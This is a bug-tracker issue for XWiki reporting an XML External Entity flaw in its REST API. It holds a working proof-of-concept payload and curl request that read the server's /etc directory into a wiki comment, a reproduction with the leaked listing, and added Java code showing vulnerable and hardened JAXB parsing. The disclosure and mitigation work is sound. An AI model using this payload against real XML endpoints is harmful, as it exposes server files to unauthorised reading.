Details
- Type: Bug
- Resolution: Fixed
- Priority: Major
- 4.0-rc-1
- None
Description
from an email I got:
The XWiki REST API is vulnerable to an XML External Entity attack. This vulnerability allows at least to read any file and directory accessible to the user running the application. The following PoC will create a comment including a listing of the '/etc/' directory.

* XML document (com.xml):

    <!DOCTYPE comment [ <!ENTITY bingo SYSTEM "file:///etc/"> ]>
    <comment xmlns="http://www.xwiki.org">
      <text>This is a comment. Nothing fancy but -- &bingo; -- ...</text>
    </comment>

* Call to the REST API:

    curl -u XXX:XXX -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://XXX/xwiki/rest/wikis/XXX/spaces/XXX/pages/XXX/comments"

Regards,
Nicolas Grégoire
repeated:
user@debo8:~$ curl -u user:passwd -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/comments"
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><comment xmlns="http://www.xwiki.org"><link rel="http://www.xwiki.org/rel/page" href="http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome"/><id>2</id><author>XWiki.user</author><date>2012-04-11T20:46:59.040-04:00</date><text>This is a comment. Nothing fancy but -- .java .pwd.lock acpi adduser.conf adjtime aliases alsa alternatives anacrontab apache2 apm apt asound.names asound.state at.deny avahi bash_completion bash_completion.d bash.bashrc bindresvport.blacklist blkid.tab blkid.tab.old bluetooth bonobo-activation ca-certificates ca-certificates.conf ca-certificates.conf.dpkg-old calendar chatscripts chromium chromium-browser clutter-imcontext colord.conf compizconfig console ConsoleKit console-tools cron.d cron.daily cron.hourly cron.monthly cron.weekly crontab crypttab cups dbus-1 debconf.conf debian_version default defoma deluser.conf dfs dhcp dhcp3 dictionaries-common dkms dm dnsmasq.conf dnsmasq.conf.dpkg-old dnsmasq.d doc-base dpkg dumpasn1 emacs email-addresses environment esound ethertypes exim4 exports fam.conf festival.scm fonts foomatic fop.conf.d fstab fstab.d fuse.conf gai.conf gconf gdb gdm ghostscript gimp gnashpluginrc gnashrc gnome gnome-system-tools gnome-vfs-2.0 gnome-vfs-mime-magic gre.d groff groovy group group- grub.d gshadow gshadow- gssapi_mech.conf gtk-2.0 gtk-3.0 gtkmathview hal hddtemp.db hdparm.conf hesiod.conf host.conf hostname hosts hosts.allow hosts.deny hp icedove icedtea-web iceweasel idmapd.conf ImageMagick inetd.conf init.d initramfs-tools inittab inputrc insserv insserv.conf insserv.conf.d iproute2 irssi.conf issue issue.net java java-6-cacao java-6-openjdk java-6-sun javascript-common john kde3 kernel kernel-img.conf kerneloops.conf kernel-pkg.conf keys kvm labrea ld.so.cache ld.so.conf ld.so.conf.d ldap libao.conf libaudit.conf libgda-3.0 libpaper.d libreoffice libvirt lighttpd locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d lsb-base lvm lynx-cur magic magic.mime mail.rc mailcap mailcap.order mailname manpath.config maven2 menu menu-methods mercurial mime.types mke2fs.conf modprobe.d modules mono motd motd.tail mplayer mtab mtools.conf Muttrc Muttrc.d mysql nanorc netconfig netscsid.conf network NetworkManager networks nsswitch.conf obex-data-server openal OpenCL openoffice openvpn opt oss.conf pam.conf pam.d pango papersize passwd passwd- perl pm pnm2ppa.conf polipo polkit-1 postgresql postgresql-common ppp prelink.conf profile profile.d protocols pulse purple python python2.5 python2.6 python2.7 qemu-ifup rc.local rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d rearj.cfg reportbug.conf resolv.conf resolvconf rmt rpc rsyslog.conf rsyslog.d samba sane.d sasl2 screenrc securetty security selinux sensors.conf sensors.d sensors3.conf services sgml shadow shadow- shells skel smartd.conf smartmontools smi.conf snmp sound speech-dispatcher ssh ssl subversion sudoers sudoers.d sudoers.dpkg-dist sysconfig sysctl.conf sysctl.conf.dpkg-old sysctl.d systemd terminfo texmf timezone timidity tomcat5.5 tor ts.conf tsocks.conf ucf.conf udev ufw updatedb.conf update-notifier UPower vde2 velocity vga vim vpnc w3m wgetrc wildmidi wireshark wodim.conf wpa_supplicant X11 xchat-systray xdg xen xml zfs -- ...</text><replyTo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:nil="true"/></comment>
user@debo8:~$
Not repeatable with a guest user, even if guest is allowed to comment.
user@debo8:~$ curl -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/comments"
Error number 9001 in 9: Access denied in edit mode on document xwiki:Main.WebHome
user@debo8:~$
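The PoC works because the request body is handed to an XML parser that still honours DOCTYPE declarations and resolves external general entities, so `&bingo;` is replaced by the contents of `file:///etc/` (a directory, which the JDK's `file:` handler renders as a listing, hence the output above). The example below is added here for illustration and is not XWiki's own code or its fix; it assumes the body is unmarshalled with JAXB (`javax.xml.bind`, present in Java 8 or added as the `jaxb-api` dependency) and uses an illustrative `Comment` class and a constructed temporary file in place of `/etc/`. It parses the same document shape twice: once with JAXB's default parser, which expands the entity, and once through a SAX reader that refuses any DOCTYPE and has external entity resolution disabled, which rejects the document before the entity is ever touched.

```java
// Added example, not XWiki code: JAXB unmarshalling of a REST-style comment
// document with a default parser (entity expanded) and a hardened parser
// (document rejected). Class and field names here are illustrative.
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.UnmarshalException;
import javax.xml.bind.Unmarshaller;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlElement;
import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.sax.SAXSource;
import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;

public class CommentXxeDemo {
    static final String NS = "http://www.xwiki.org";

    // Minimal stand-in for the REST model's comment element (illustrative).
    @XmlRootElement(name = "comment", namespace = NS)
    @XmlAccessorType(XmlAccessType.FIELD)
    public static class Comment {
        @XmlElement(namespace = NS)
        public String text;
    }

    // Vulnerable pattern: let JAXB pick its own SAX parser. Its defaults keep
    // DTD processing and external general entities on, so &bingo; is expanded.
    static Comment unmarshalDefault(String xml) throws Exception {
        Unmarshaller u = JAXBContext.newInstance(Comment.class).createUnmarshaller();
        return (Comment) u.unmarshal(new StringReader(xml));
    }

    // Hardened pattern: hand JAXB an XMLReader that rejects DOCTYPE outright
    // (the PoC needs one to declare its entity) and, as defence in depth,
    // has external general and parameter entities switched off.
    static Comment unmarshalHardened(String xml) throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setNamespaceAware(true);
        spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        spf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        XMLReader reader = spf.newSAXParser().getXMLReader();
        SAXSource source = new SAXSource(reader, new InputSource(new StringReader(xml)));
        Unmarshaller u = JAXBContext.newInstance(Comment.class).createUnmarshaller();
        return (Comment) u.unmarshal(source);
    }

    public static void main(String[] args) throws Exception {
        // Constructed target file standing in for /etc/ from the report.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "SECRET-CONTENT".getBytes(StandardCharsets.UTF_8));

        // Same shape as com.xml, with the entity pointing at the temp file.
        String xml = "<!DOCTYPE comment [ <!ENTITY bingo SYSTEM \"" + secret.toUri() + "\"> ]>"
            + "<comment xmlns=\"" + NS + "\"><text>Nothing fancy but -- &bingo; -- ...</text></comment>";

        Comment c = unmarshalDefault(xml);
        System.out.println("default parser  : " + c.text);   // text now carries SECRET-CONTENT

        try {
            unmarshalHardened(xml);
            System.out.println("hardened parser : entity expanded (NOT expected)");
        } catch (UnmarshalException e) {
            // JAXB wraps the SAXParseException raised for the DOCTYPE.
            System.out.println("hardened parser : rejected -> " + e.getCause().getMessage());
        }
        Files.delete(secret);
    }
}
```

The check a reviewer wants on any JAXB, DOM, SAX or StAX entry point in a REST layer is the same: the parser behind it must be one the application configured, not one created implicitly by `unmarshal(Reader)` or `DocumentBuilderFactory.newInstance()` with stock features. Rejecting DOCTYPE is the simplest complete mitigation for an API that never needs DTDs; disabling the two entity features alone still leaves internal entity expansion (billion laughs) available to an attacker.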
Issue Links
- relates to XWIKI-12910 Security Hole in the XML-RPC component (Closed)